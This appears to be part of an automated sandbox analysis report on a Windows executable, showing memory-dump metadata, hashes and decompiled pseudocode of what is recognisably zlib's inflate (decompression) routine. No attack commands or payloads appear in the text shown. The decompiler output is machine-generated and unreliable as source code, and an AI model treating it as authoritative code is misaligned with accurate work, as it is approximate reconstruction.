                                                                                                                                                                                                                              0x7ff735c48d5c
                                                                                                                                                                                                                              0x7ff735c48d63
                                                                                                                                                                                                                              0x7ff735c48d7a

                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: incorrect header check$invalid window size$unknown compression method
                                                                                                                                                                                                                              • API String ID: 0-1186847913
                                                                                                                                                                                                                              • Opcode ID: c57efdcc8c95547de6308c9ba832f99c990f42aa06f9db8ddb76984ee9724378
                                                                                                                                                                                                                              • Instruction ID: 6611a417949dc03fb7b73e1a731ad72a66d274211480a9c04b15d158aab441fd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c57efdcc8c95547de6308c9ba832f99c990f42aa06f9db8ddb76984ee9724378
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E79129B3A182A757E7A6AF14C448E3E7BEEFB40B48F914135DA4946780DB3CE941DB10
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C47D8C Relevance: 3.9, Strings: 3, Instructions: 161COMMONCrypto
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 67%
                                                                                                                                                                                                                              			E00007FF77FF735C47D8C(signed int __ebx, void* __edi, void* __ebp, signed char* __rsi, signed long long __r8, void* __r9, void* __r11, signed long long __r12, void* __r13, void* __r14) {
				signed int _t350;
				signed int _t351;
				intOrPtr _t362;
				void* _t363;
				signed int _t383;
				signed int _t386;
				unsigned int _t388;
				unsigned int _t392;
				signed int _t408;
				signed int _t410;
				signed int _t417;
				signed char _t422;
				signed int _t435;
				signed char _t440;
				unsigned int _t447;
				void* _t448;
				signed int _t457;
				signed int _t471;
				signed int _t480;
				signed int _t481;
				void* _t482;
				signed int _t485;
				signed int _t486;
				signed int _t487;
				signed int _t489;
				void* _t490;
				signed int _t491;
				void* _t492;
				signed int _t493;
				void* _t494;
				signed int _t495;
				void* _t496;
				signed int _t498;
				signed int _t499;
				void* _t500;
				signed int _t502;
				signed int _t503;
				void* _t504;
				signed int _t506;
				void* _t507;
				signed int _t508;
				signed int _t509;
				void* _t510;
				signed int _t512;
				void* _t513;
				signed int _t514;
				signed int _t516;
				signed int _t517;
				signed char _t526;
				signed char _t529;
				signed int _t531;
				signed char _t532;
				signed int _t536;
				signed char _t553;
				signed char _t557;
				signed char _t587;
				signed char _t590;
				signed char _t596;
				signed char _t620;
				signed char _t623;
				signed char _t629;
				void* _t631;
				intOrPtr _t632;
				void* _t636;
				signed int _t647;
				signed int _t656;
				signed char _t661;
				void* _t663;
				void* _t667;
				void* _t671;
				signed char _t683;
				signed char _t688;
				intOrPtr _t690;
				void* _t692;
				intOrPtr _t693;
				void* _t694;
				void* _t695;
				void* _t696;
				void* _t697;
				void* _t698;
				void* _t699;
				void* _t700;
				intOrPtr _t701;
				intOrPtr _t702;
				void* _t703;
				void* _t704;
				void* _t705;
				void* _t706;
				void* _t707;
				void* _t708;
				void* _t709;
				void* _t711;
				signed int _t717;
				unsigned int _t718;
				unsigned int _t721;
				unsigned int _t722;
				signed int _t724;
				signed int _t725;
				signed int _t726;
				signed int _t727;
				unsigned int _t728;
				unsigned int _t730;
				unsigned int _t735;
				unsigned int _t738;
				unsigned int _t741;
				signed int _t744;
				unsigned int _t745;
				unsigned int _t748;
				signed int _t750;
				unsigned int _t751;
				signed int _t754;
				unsigned int _t755;
				signed int _t757;
				unsigned int _t758;
				void* _t768;
				void* _t803;
				void* _t815;
				void* _t888;
				signed long long _t892;
				long long _t893;
				signed long long _t896;
				signed long long _t897;
				long long _t900;
				signed long long _t904;
				signed long long _t906;
				signed long long _t909;
				void* _t912;
				signed long long _t917;
				signed long long _t918;
				signed long long _t919;
				signed long long _t921;
				signed long long _t922;
				signed long long _t923;
				void* _t924;
				signed char* _t941;
				signed char* _t942;
				signed char* _t944;
				signed char* _t945;
				signed char* _t946;
				signed char* _t947;
				signed char* _t948;
				signed char* _t949;
				signed char* _t951;
				signed char* _t952;
				signed char* _t953;
				signed char* _t954;
				signed char* _t955;
				signed char* _t956;
				signed char* _t957;
				signed char* _t958;
				void* _t961;
				void* _t963;
				signed long long _t965;
				char* _t973;
				char* _t974;
				long long _t975;
				intOrPtr _t976;
				intOrPtr _t977;
				intOrPtr _t978;
				void* _t979;
				signed long long _t980;
				long long _t986;

				_t980 = __r12;
				_t979 = __r11;
				_t965 = __r8;
				if (__ebx - 0x20 >= 0) goto 0x35c47daf;
				if (__edi == 0) goto 0x35c47eff;
				_t692 = __edi - 1;
				_t713 = __ebp + (( *__rsi & 0x000000ff) << __ebx);
				_t941 =  &(__rsi[1]);
				if (__ebx + 8 - 0x20 < 0) goto 0x35c47d91;
				_t480 = r15d;
				_t350 = (__ebp + (( *__rsi & 0x000000ff) << __ebx) >> 0x00000008 & 0x0000ff00) + ((__ebp + (( *__rsi & 0x000000ff) << __ebx) & 0x0000ff00) + (_t713 << 0x10) << 8) + (_t713 >> 0x18);
				 *(__r13 + 0x20) = _t350;
				 *(__r12 + 0x4c) = _t350;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f3e;
				if ( *((intOrPtr*)(__r13 + 0x14)) == 0) goto 0x35c48c20;
				r8d = 0;
				_t351 = E00007FF77FF735C49230(0, _t888, _t924, __r8, __r9);
				r10d =  *(_t963 + 0xb8);
				 *(__r13 + 0x20) = _t351;
				 *(__r12 + 0x4c) = _t351;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f3f;
				if (__r14 - 5 - 1 <= 0) goto 0x35c47eff;
				if ( *(__r13 + 0xc) == 0) goto 0x35c47e43;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f4e;
				_t526 = _t480 & 0x00000007;
				_t481 = _t480 - _t526;
				goto 0x35c47d5c;
				if (_t481 - 3 >= 0) goto 0x35c47e66;
				if (_t692 == 0) goto 0x35c47eff;
				_t693 = _t692 - 1;
				_t717 = (r15d >> _t526) + (( *_t941 & 0x000000ff) << _t481);
				_t942 =  &(_t941[1]);
				_t482 = _t481 + 8;
				_t768 = _t482 - 3;
				if (_t768 < 0) goto 0x35c47e48;
				_t718 = _t717 >> 1;
				 *(__r13 + 0xc) = _t717 & 0x00000001;
				if (_t768 == 0) goto 0x35c47f9d;
				if (_t768 == 0) goto 0x35c47ec1;
				if (_t768 == 0) goto 0x35c47eae;
				if ((_t718 & 0x00000003) != 1) goto 0x35c47fa5;
				 *(__r12 + 0x20) = "invalid block type";
				 *((intOrPtr*)(__r13 + 8)) = 0x3f51;
				goto 0x35c47d5c;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f44;
				goto 0x35c47d5c;
				 *(__r13 + 0x70) = 9;
				 *((long long*)(__r13 + 0x60)) = 0x35c6bcb0;
				 *((long long*)(__r13 + 0x68)) = 0x35c6c4b0;
				 *((intOrPtr*)(__r13 + 0x74)) = 5;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f47;
				if (r14d != 6) goto 0x35c47fa5;
				_t721 = _t718 >> 2 >> 2 >> 2;
				_t485 = _t482 + 0x2fffffff7;
				r14d =  *(_t963 + 0xa0);
				r15d =  *(_t963 + 0xb0);
				 *((long long*)(__r12 + 0x10)) =  *((intOrPtr*)(_t963 + 0x40));
				 *(__r12 + 0x18) =  *(_t963 + 0xb8);
				 *__r12 = _t942;
				 *((intOrPtr*)(__r12 + 8)) = _t693;
				 *(__r13 + 0x48) = _t721;
				 *(__r13 + 0x4c) = _t485;
				if ( *((intOrPtr*)(__r13 + 0x34)) != 0) goto 0x35c47f6e;
				if (r14d ==  *(__r12 + 0x18)) goto 0x35c48c91;
				_t362 =  *((intOrPtr*)(__r13 + 8));
				if (_t362 - 0x3f51 >= 0) goto 0x35c48c91;
				if (_t362 - 0x3f4e < 0) goto 0x35c47f6e;
				if ( *((intOrPtr*)(_t963 + 0xa8)) == 4) goto 0x35c48c91;
				r8d = r14d;
				r8d = r8d -  *(__r12 + 0x18);
				_t363 = E00007FF77FF735C49120(0x35c6c4b0, _t912, __r12,  *((intOrPtr*)(__r12 + 0x10)), _t961); // executed
				if (_t363 == 0) goto 0x35c48c91;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f52;
				goto 0x35c48d6a;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f41;
				_t722 = _t721 >> 2;
				_t486 = _t485 + 0xfffffffd;
				_t529 = _t486 & 0x00000007;
				_t487 = _t486 - _t529;
				if (_t487 - 0x20 >= 0) goto 0x35c47fde;
				if (_t693 == 0) goto 0x35c47eff;
				_t694 = _t693 - 1;
				_t724 = (_t722 >> _t529) + (( *_t942 & 0x000000ff) << _t487);
				if (_t487 + 8 - 0x20 < 0) goto 0x35c47fc0;
				_t531 = _t724 & 0x0000ffff;
				if (_t531 ==  !_t724 >> 0x10) goto 0x35c48005;
				_t892 = "invalid stored block lengths";
				 *(__r12 + 0x20) = _t892;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f51;
				goto 0x35c47d61;
				 *(__r13 + 0x50) = _t531;
				_t725 = r15d;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f42;
				_t489 = r15d;
				if (r14d == 6) goto 0x35c47eff;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f43;
				_t532 =  *(__r13 + 0x50);
				if (_t532 == 0) goto 0x35c4808b;
				r14d = r10d;
				_t371 =  <=  ? _t532 : _t694;
				r14d =  <=  ?  <=  ? _t532 : _t694 : r14d;
				if (r14d == 0) goto 0x35c47eff;
				r8d = r14d;
				E00007FF77FF735C4B150();
				r10d =  *(_t963 + 0xb8);
				_t695 = _t694 - r14d;
				r10d = r10d - r14d;
				 *(_t963 + 0xb8) = r10d;
				_t944 =  &(( &(_t942[1]))[_t892]);
				 *((long long*)(_t963 + 0x40)) =  *((intOrPtr*)(_t963 + 0x40)) + _t892;
				 *(__r13 + 0x50) =  *(__r13 + 0x50) - r14d;
				goto 0x35c47d61;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f3f;
				if (_t489 - 0xe >= 0) goto 0x35c480be;
				if (_t695 == 0) goto 0x35c47eff;
				_t696 = _t695 - 1;
				_t726 = _t725 + (( *_t944 & 0x000000ff) << _t489);
				_t945 =  &(_t944[1]);
				_t490 = _t489 + 8;
				if (_t490 - 0xe < 0) goto 0x35c480a0;
				_t491 = _t490 + 0xfffffff2;
				_t727 = _t726 >> 5;
				_t536 = (_t726 & 0x0000001f) + 0x101;
				_t728 = _t727 >> 5;
				 *(__r13 + 0x7c) = _t536;
				_t656 = (_t727 & 0x0000001f) + 1;
				 *(__r13 + 0x80) = _t656;
				 *((intOrPtr*)(__r13 + 0x78)) = (_t728 & 0x0000000f) + 4;
				if (_t536 - 0x11e > 0) goto 0x35c48220;
				if (_t656 - 0x1e > 0) goto 0x35c48220;
				 *(__r13 + 0x84) = r15d;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f45;
				if ( *(__r13 + 0x84) -  *((intOrPtr*)(__r13 + 0x78)) >= 0) goto 0x35c48188;
				if (_t491 - 3 >= 0) goto 0x35c4814e;
				if (_t696 == 0) goto 0x35c47eff;
				_t697 = _t696 - 1;
				_t730 = (_t728 >> 4) + (( *_t945 & 0x000000ff) << _t491);
				_t946 =  &(_t945[1]);
				_t492 = _t491 + 8;
				if (_t492 - 3 < 0) goto 0x35c48130;
				_t493 = _t492 + 0xfffffffd;
				 *(__r13 + 0x90 + _t892 * 2) = _t730 & 7;
				 *(__r13 + 0x84) =  *(__r13 + 0x84) + 1;
				_t383 =  *(__r13 + 0x84);
				if (_t383 -  *((intOrPtr*)(__r13 + 0x78)) < 0) goto 0x35c48124;
				if (_t383 - 0x13 >= 0) goto 0x35c481ba;
				 *(__r13 + 0x90 + _t892 * 2) = r15w;
				 *(__r13 + 0x84) =  *(__r13 + 0x84) + 1;
				if ( *(__r13 + 0x84) - 0x13 < 0) goto 0x35c48190;
				_t917 = __r13 + 0x70;
				_t893 = __r13 + 0x550;
				 *_t917 = 7;
				 *((long long*)(__r13 + 0x60)) = _t893;
				 *((long long*)(__r13 + 0x88)) = _t893;
				 *((long long*)(_t963 + 0x28)) = __r13 + 0x310;
				 *(_t963 + 0x20) = _t917;
				_t87 = _t917 + 0x13; // 0x13
				r8d = _t87;
				_t386 = E00007FF77FF735C49860(0, __r13 + 0x90, _t961, __r13 + 0x88, __r12);
				 *(_t963 + 0xb0) = _t386;
				if (_t386 == 0) goto 0x35c48239;
				 *(_t980 + 0x20) = "invalid code lengths set";
				 *((intOrPtr*)(__r13 + 8)) = 0x3f51;
				goto 0x35c47d54;
				_t896 = "too many length or distance symbols";
				 *(_t980 + 0x20) = _t896;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f51;
				goto 0x35c47d61;
				 *(__r13 + 0x84) = r15d;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f46;
				r10d =  *(__r13 + 0x7c);
				if ( *(__r13 + 0x84) -  *(__r13 + 0x80) + r10d >= 0) goto 0x35c48462;
				r9d = 1;
				_t976 =  *((intOrPtr*)(__r13 + 0x60));
				r9d = r9d <<  *(__r13 + 0x70);
				r9d = r9d - 1;
				_t918 = _t917 & _t896;
				_t388 =  *(_t976 + _t918 * 4);
				r8d = _t388;
				r8d = r8d >> 0x10;
				 *(_t963 + 0x34) = _t388;
				if ((_t388 >> 0x00000008 & 0x000000ff) - _t493 <= 0) goto 0x35c482e3;
				if (_t697 == 0) goto 0x35c47eff;
				_t698 = _t697 - 1;
				_t947 =  &(_t946[1]);
				_t494 = _t493 + 8;
				_t897 = _t896 & _t918;
				_t392 =  *(_t976 + _t897 * 4);
				_t661 = _t392 >> 8;
				r8d = _t392;
				r8d = r8d >> 0x10;
				 *(_t963 + 0x34) = _t392;
				if ((_t661 & 0x000000ff) - _t494 > 0) goto 0x35c482a7;
				_t803 = r8w - 0x10;
				if (_t803 >= 0) goto 0x35c4831a;
				_t495 = _t494 - (_t661 & 0x000000ff);
				 *((short*)(__r13 + 0x90 + _t918 * 2)) = _t392 >> 0x10;
				 *(__r13 + 0x84) =  *(__r13 + 0x84) + 1;
				r8d =  *(__r13 + 0x84);
				goto 0x35c48447;
				if (_t803 != 0) goto 0x35c48379;
				_t663 = (_t661 & 0x000000ff) + 2;
				if (_t495 - _t663 >= 0) goto 0x35c48343;
				if (_t698 == 0) goto 0x35c47eff;
				_t699 = _t698 - 1;
				_t948 =  &(_t947[1]);
				_t496 = _t495 + 8;
				if (_t496 - _t663 < 0) goto 0x35c48326;
				_t553 =  *(_t963 + 0x35) & 0x000000ff;
				_t735 = ((_t730 >> 3) + (( *_t946 & 0x000000ff) << _t493) >> (_t661 & 0x000000ff)) + (( *_t947 & 0x000000ff) << _t495) >> _t553;
				if ( *(__r13 + 0x84) == 0) goto 0x35c48492;
				_t498 = _t496 - _t553 + 0xfffffffe;
				r9d =  *(__r13 + 0x90 + _t897 * 2) & 0x0000ffff;
				goto 0x35c48403;
				if (r8w != 0x11) goto 0x35c483c0;
				_t667 = (_t735 & 0x00000003) + 6;
				if (_t498 - _t667 >= 0) goto 0x35c483a4;
				if (_t699 == 0) goto 0x35c47eff;
				_t700 = _t699 - 1;
				_t949 =  &(_t948[1]);
				_t499 = _t498 + 8;
				if (_t499 - _t667 < 0) goto 0x35c48387;
				_t738 = (_t735 >> 2) + (( *_t948 & 0x000000ff) << _t498) >> ( *(_t963 + 0x35) & 0x000000ff);
				r9d = r15d;
				goto 0x35c483ff;
				_t671 = (_t738 & 0x00000007) + 0xa;
				if (_t499 - _t671 >= 0) goto 0x35c483e4;
				if (_t700 == 0) goto 0x35c47eff;
				_t701 = _t700 - 1;
				_t500 = _t499 + 8;
				if (_t500 - _t671 < 0) goto 0x35c483c7;
				_t557 =  *(_t963 + 0x35) & 0x000000ff;
				_t741 = (_t738 >> 3) + (( *_t949 & 0x000000ff) << _t499) >> _t557;
				r9d = r15w & 0xffffffff;
				_t815 =  *(__r13 + 0x84) + (_t741 & 0x0000007f) + 0xb -  *(__r13 + 0x80) +  *(__r13 + 0x7c);
				if (_t815 > 0) goto 0x35c48492;
				 *(__r13 + 0x90 + _t897 * 2) = r9w;
				r8d =  *(__r13 + 0x84);
				r8d = __r8 + 1;
				 *(__r13 + 0x84) = r8d;
				if (_t815 != 0) goto 0x35c48420;
				r10d =  *(__r13 + 0x7c);
				if (r8d -  *(__r13 + 0x80) + r10d < 0) goto 0x35c48270;
				if ( *((intOrPtr*)(__r13 + 8)) == 0x3f51) goto 0x35c47d54;
				if ( *((short*)(__r13 + 0x290)) != 0) goto 0x35c484ab;
				 *(_t980 + 0x20) = "invalid code -- missing end-of-block";
				 *((intOrPtr*)(__r13 + 8)) = 0x3f51;
				goto 0x35c47d54;
				 *(_t980 + 0x20) = "invalid bit length repeat";
				 *((intOrPtr*)(__r13 + 8)) = 0x3f51;
				goto 0x35c47d54;
				_t900 = __r13 + 0x550;
				 *(__r13 + 0x70) = 9;
				 *((long long*)(__r13 + 0x88)) = _t900;
				_t986 = __r13 + 0x310;
				 *((long long*)(__r13 + 0x60)) = _t900;
				 *((long long*)(_t963 + 0x28)) = _t986;
				 *(_t963 + 0x20) = __r13 + 0x70;
				r8d = r10d;
				_t408 = E00007FF77FF735C49860(1, __r13 + 0x90, _t961, __r13 + 0x88, _t980);
				 *(_t963 + 0xb0) = _t408;
				if (_t408 == 0) goto 0x35c48519;
				 *(_t980 + 0x20) = "invalid literal/lengths set";
				 *((intOrPtr*)(__r13 + 8)) = 0x3f51;
				goto 0x35c47d54;
				_t903 =  *((intOrPtr*)(__r13 + 0x88));
				_t919 = __r13 + 0x74;
				r8d =  *(__r13 + 0x80);
				 *((long long*)(__r13 + 0x68)) =  *((intOrPtr*)(__r13 + 0x88));
				 *_t919 = 6;
				 *((long long*)(_t963 + 0x28)) = _t986;
				 *(_t963 + 0x20) = _t919;
				_t410 = E00007FF77FF735C49860(2, 0x90 + _t903 * 2 + __r13, _t961, __r13 + 0x88, _t980);
				 *(_t963 + 0xb0) = _t410;
				r15d = _t410;
				if (_t410 == 0) goto 0x35c48586;
				_t904 = "invalid distances set";
				 *(_t980 + 0x20) = _t904;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f51;
				goto 0x35c47d54;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f47;
				if ( *((intOrPtr*)(_t963 + 0xa8)) == 6) goto 0x35c48c84;
				r8d =  *(_t963 + 0xa0);
				r15d = 0;
				r10d =  *(_t963 + 0xb8);
				 *((intOrPtr*)(__r13 + 8)) = 0x3f48;
				if (_t701 - 6 < 0) goto 0x35c48638;
				if (r10d - 0x102 < 0) goto 0x35c48638;
				 *((long long*)(_t980 + 0x10)) =  *((intOrPtr*)(_t963 + 0x40));
				_t921 = _t980;
				 *(_t980 + 0x18) = r10d;
				 *_t980 =  &(_t949[1]);
				 *((intOrPtr*)(_t980 + 8)) = _t701;
				 *(__r13 + 0x48) = _t741 >> 7;
				 *(__r13 + 0x4c) = _t500 + 0xfffffff9 - _t557;
				E00007FF77FF735C49E20(r8d, _t711, _t904, _t921, _t976, _t979);
				r10d =  *(_t980 + 0x18);
				_t951 =  *_t980;
				_t702 =  *((intOrPtr*)(_t980 + 8));
				_t502 =  *(__r13 + 0x4c);
				 *((long long*)(_t963 + 0x40)) =  *((intOrPtr*)(_t980 + 0x10));
				 *(_t963 + 0xb8) = r10d;
				if ( *((intOrPtr*)(__r13 + 8)) != 0x3f3f) goto 0x35c47d61;
				 *(__r13 + 0x1be4) = 0xffffffff;
				goto 0x35c47d61;
				_t977 =  *((intOrPtr*)(__r13 + 0x60));
				_t922 = _t921 & _t904;
				 *(__r13 + 0x1be4) = r15d;
				if (( *(_t977 + _t922 * 4) >> 0x00000008 & 0x000000ff) - _t502 <= 0) goto 0x35c48697;
				if (_t702 == 0) goto 0x35c47eff;
				_t703 = _t702 - 1;
				_t744 =  *(__r13 + 0x48) + (( *_t951 & 0x000000ff) << _t502);
				_t952 =  &(_t951[1]);
				_t503 = _t502 + 8;
				_t417 =  *(_t977 + (_t904 & _t922) * 4);
				if ((_t417 >> 0x00000008 & 0x000000ff) - _t503 > 0) goto 0x35c48667;
				if (_t417 == 0) goto 0x35c48753;
				if ((_t417 & 0x000000f0) != 0) goto 0x35c48753;
				 *(_t963 + 0x34) = _t417;
				r14d =  *(_t963 + 0x35) & 0x000000ff;
				r8d = 1;
				r9d = _t417 >> 0x00000008 & 0x000000ff;
				r8d = r8d << (_t417 & 0x000000ff) + r9d;
				r8d = r8d - 1;
				r8d = r8d & _t744;
				r8d = r8d >> r9d;
				r8d = r8d + (_t417 >> 0x10);
				r8d =  *(_t977 + _t965 * 4) >> 0x00000008 & 0x000000ff;
				r8d = r8d + r9d;
				if (r8d - _t503 <= 0) goto 0x35c48744;
				r11d =  *(_t963 + 0x36) & 0x0000ffff;
				if (_t703 == 0) goto 0x35c47eff;
				r8d = 1;
				_t745 = _t744 + (( *_t952 & 0x000000ff) << _t503);
				_t704 = _t703 - 1;
				r8d = r8d << (_t417 & 0x000000ff) + r14d;
				_t953 =  &(_t952[1]);
				r8d = r8d - 1;
				r8d = r8d & _t745;
				_t504 = _t503 + 8;
				r8d = r8d >> r14d;
				r8d = r8d + r11d;
				_t422 =  *(_t977 + _t965 * 4);
				r8d = _t422 >> 0x00000008 & 0x000000ff;
				r8d = r8d + r14d;
				if (r8d - _t504 > 0) goto 0x35c486f8;
				_t587 = r14d;
				 *(__r13 + 0x1be4) = _t587;
				_t590 = _t422 >> 0x00000008 & 0x000000ff;
				 *(__r13 + 0x1be4) =  *(__r13 + 0x1be4) + _t590;
				_t506 = _t504 - r14d - _t590;
				 *(__r13 + 0x50) = _t422 >> 0x10;
				if (_t422 != 0) goto 0x35c48780;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f4d;
				goto 0x35c47d54;
				if ((_t422 & 0x00000020) == 0) goto 0x35c48794;
				 *(__r13 + 0x1be4) = 0xffffffff;
				goto 0x35c47d4c;
				if ((_t422 & 0x00000040) == 0) goto 0x35c487b1;
				_t906 = "invalid literal/length code";
				 *(_t980 + 0x20) = _t906;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f51;
				goto 0x35c47d54;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f49;
				 *(__r13 + 0x58) = _t422 & 0xf;
				_t683 =  *(__r13 + 0x58);
				if (_t683 == 0) goto 0x35c48809;
				if (_t506 - _t683 >= 0) goto 0x35c487ed;
				if (_t704 == 0) goto 0x35c47eff;
				_t705 = _t704 - 1;
				_t748 = (_t745 >> _t587 >> _t590) + (( *_t953 & 0x000000ff) << _t506);
				_t954 =  &(_t953[1]);
				_t507 = _t506 + 8;
				if (_t507 - _t683 < 0) goto 0x35c487d0;
				_t596 = _t683;
				_t508 = _t507 - _t683;
				 *(__r13 + 0x50) =  *(__r13 + 0x50) + ((0x00000001 << _t596) - 0x00000001 & _t748);
				 *(__r13 + 0x1be4) =  *(__r13 + 0x1be4) + _t683;
				 *(__r13 + 0x1be8) =  *(__r13 + 0x50);
				 *((intOrPtr*)(__r13 + 8)) = 0x3f4a;
				_t978 =  *((intOrPtr*)(__r13 + 0x68));
				_t923 = _t922 & _t906;
				if (( *(_t978 + _t923 * 4) >> 0x00000008 & 0x000000ff) - _t508 <= 0) goto 0x35c48874;
				if (_t705 == 0) goto 0x35c47eff;
				_t706 = _t705 - 1;
				_t750 = (_t748 >> _t596) + (( *_t954 & 0x000000ff) << _t508);
				_t955 =  &(_t954[1]);
				_t509 = _t508 + 8;
				_t435 =  *(_t978 + (_t906 & _t923) * 4);
				if ((_t435 >> 0x00000008 & 0x000000ff) - _t509 > 0) goto 0x35c48844;
				if ((_t435 & 0x000000f0) != 0) goto 0x35c4892b;
				 *(_t963 + 0x34) = _t435;
				r14d =  *(_t963 + 0x35) & 0x000000ff;
				r8d = 1;
				r9d = _t435 >> 0x00000008 & 0x000000ff;
				r8d = r8d << (_t435 & 0x000000ff) + r9d;
				r8d = r8d - 1;
				r8d = r8d & _t750;
				r8d = r8d >> r9d;
				r8d = r8d + (_t435 >> 0x10);
				r8d =  *(_t978 + _t965 * 4) >> 0x00000008 & 0x000000ff;
				r8d = r8d + r9d;
				if (r8d - _t509 <= 0) goto 0x35c4891c;
				r11d =  *(_t963 + 0x36) & 0x0000ffff;
				if (_t706 == 0) goto 0x35c47eff;
				r8d = 1;
				_t751 = _t750 + (( *_t955 & 0x000000ff) << _t509);
				_t707 = _t706 - 1;
				r8d = r8d << (_t435 & 0x000000ff) + r14d;
				_t956 =  &(_t955[1]);
				r8d = r8d - 1;
				r8d = r8d & _t751;
				_t510 = _t509 + 8;
				r8d = r8d >> r14d;
				r8d = r8d + r11d;
				_t440 =  *(_t978 + _t965 * 4);
				r8d = _t440 >> 0x00000008 & 0x000000ff;
				r8d = r8d + r14d;
				if (r8d - _t510 > 0) goto 0x35c488d0;
				_t620 = r14d;
				 *(__r13 + 0x1be4) =  *(__r13 + 0x1be4) + _t620;
				r10d =  *(_t963 + 0xb8);
				_t623 = _t440 >> 0x00000008 & 0x000000ff;
				 *(__r13 + 0x1be4) =  *(__r13 + 0x1be4) + _t623;
				_t512 = _t510 - r14d - _t623;
				if ((_t440 & 0x00000040) == 0) goto 0x35c48963;
				 *(_t980 + 0x20) = "invalid distance code";
				 *((intOrPtr*)(__r13 + 8)) = 0x3f51;
				goto 0x35c47d5c;
				r8d =  *(_t963 + 0xa0);
				 *(__r13 + 0x54) = _t440 >> 0x10;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f4b;
				 *(__r13 + 0x58) = _t440 & 0xf;
				_t688 =  *(__r13 + 0x58);
				if (_t688 == 0) goto 0x35c489cb;
				if (_t512 - _t688 >= 0) goto 0x35c489af;
				if (_t707 == 0) goto 0x35c47eff;
				_t708 = _t707 - 1;
				_t754 = (_t751 >> _t620 >> _t623) + (( *_t956 & 0x000000ff) << _t512);
				_t957 =  &(_t956[1]);
				_t513 = _t512 + 8;
				if (_t513 - _t688 < 0) goto 0x35c48992;
				_t629 = _t688;
				_t514 = _t513 - _t688;
				_t755 = _t754 >> _t629;
				 *(__r13 + 0x54) =  *(__r13 + 0x54) + ((0x00000001 << _t629) - 0x00000001 & _t754);
				 *(__r13 + 0x1be4) =  *(__r13 + 0x1be4) + _t688;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f4c;
				if (r10d == 0) goto 0x35c47eff;
				_t447 =  *(__r13 + 0x54);
				_t631 = r8d - r10d;
				if (_t447 - _t631 <= 0) goto 0x35c48a3b;
				_t448 = _t447 - _t631;
				if (_t448 -  *((intOrPtr*)(__r13 + 0x38)) <= 0) goto 0x35c48a15;
				if ( *((intOrPtr*)(__r13 + 0x1be0)) == 0) goto 0x35c48a15;
				_t909 = "invalid distance too far back";
				 *(_t980 + 0x20) = _t909;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f51;
				goto 0x35c47d5c;
				_t632 =  *((intOrPtr*)(__r13 + 0x3c));
				if (_t448 - _t632 <= 0) goto 0x35c48a23;
				r8d =  *(__r13 + 0x50);
				r9d = r8d;
				r9d =  <=  ? _t448 - _t632 : r9d;
				goto 0x35c48a4a;
				r8d =  *(__r13 + 0x50);
				r9d = r8d;
				_t636 =  <=  ? r9d : r10d;
				_t973 =  *((intOrPtr*)(_t963 + 0x40));
				r10d = r10d - _t636;
				r8d = r8d - _t636;
				 *(_t963 + 0xb8) = r10d;
				 *(__r13 + 0x50) = r8d;
				 *_t973 =  *( *((intOrPtr*)(_t963 + 0x40)) - _t909 - _t973 + _t973) & 0x000000ff;
				_t974 = _t973 + 1;
				if (r9d != r10d) goto 0x35c48a70;
				 *((long long*)(_t963 + 0x40)) = _t974;
				if ( *(__r13 + 0x50) != _t636 + 0xffffffff) goto 0x35c47d61;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f48;
				if (r10d == 0) goto 0x35c47eff;
				 *_t974 =  *(__r13 + 0x50) & 0x000000ff;
				_t975 = _t974 + 1;
				r10d = r10d - 1;
				 *((long long*)(_t963 + 0x40)) = _t975;
				 *(_t963 + 0xb8) = r10d;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f48;
				goto 0x35c47d61;
				if ( *((intOrPtr*)(_t961 + 0x10)) == 0) goto 0x35c48bb6;
				if (_t514 - 0x20 >= 0) goto 0x35c48afe;
				if (_t708 == 0) goto 0x35c47eff;
				_t709 = _t708 - 1;
				_t756 = _t755 + (( *_t957 & 0x000000ff) << _t514);
				_t958 =  &(_t957[1]);
